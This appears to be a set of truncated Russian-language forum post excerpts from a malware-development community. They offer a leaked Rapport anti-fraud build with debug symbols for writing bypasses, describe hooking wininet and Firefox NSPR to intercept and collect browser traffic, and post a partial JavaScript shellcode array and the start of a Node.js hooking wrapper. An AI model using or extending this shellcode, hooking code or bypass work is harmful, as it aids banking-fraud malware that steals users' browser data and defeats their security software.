Ниже представлен билд раппорта (1404.private-distro.standard-release-qa)с PDB файлами. Будет полезно тем, кто удумает писать обходы или реверсить.В архиве присутствуют все юзермодные и ядерные компоненты раппорта и к каждому файлу есть PDB и MAP файл.│   103.5.1404.59-standard-release-qa-manual-r1.rpkg│   103.5.1404.59-standard-release-qa-r1-au.rpkg│...

В IDA 6.6 есть проблемы с загрузкой символов, дизассемблер их просто не находит, несмотря на то, что путь до файлов прописан в _NT_SYMBOL_PATH _NT_SYMBOL_PATH=SRV*S:\Symbols\*http://msdl.microsoft.com/download/symbols;SRV*S:\Symbols\*http://chromium-browser-symsrv.commondatastorage.googleapis.com;SRV*S:\Symbols\*http://symbols.mozilla.org/firefox ...

Насколько я знаю, сейчас в ходу достаточно известная и простая схема перехватовтраффика в браузерах (для модификации и сбора информации). Схема хоть и популярная, нонацеленная исключительно на определенные версии браузеров. Так, например, для IE используется схема с перехватом функций wininet. Тут, кстати тоже существует как минимум две версии логики...

Думаю, комментарий излишен :) alert("Entry()"); var Shellcode = new Array( 0x60 ,0xE8 ,0xE9 ,0x00 ,0x00 ,0x00 //,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x61 ,0xB8 ,0x44 ,0x33 ,0x22 ,0x11 ,0xFF ,0xE0 ,0x56 ,0x64 ,0xA1 ,0x30 ,0x00 ,0x00 ,0x00 ,0x8B ,0x40 ,0x0C ,0x8B ,0x70 ,0x1C ,0xAD ,0x8B ,0x40 ,0x08 ,0x5E ,0xC3 ,0x55 ,0x89 ,0xE5 ,0x8B ,0x45 ,0x08...

Nodejs предоставляет довольно скромные возможности IPC в принципе, а для windows уж и подавно. Конечно, можно для коммуникации в пределах одной машины делать клиент-сервера на сокетах, если это windows. Так же можно юзать UNIX Sockets для линукса и прочих производных, которые это дело поддерживают. Так же известны костыли с mkfifo,  но это *nix и потому...

на самом деле это враппер, отлаженный на nodejs, в каллбеки которого передаются сырые данные из nspr первая но вроде рабочая версия (есть баги). Уверен тут мало кто пробовал писать хуки фф самостоятельно, так что скриптовый пример должен быть понятен. var http = require('http'); var zlib = require('zlib'); var util = require('util'); var url = require('url');...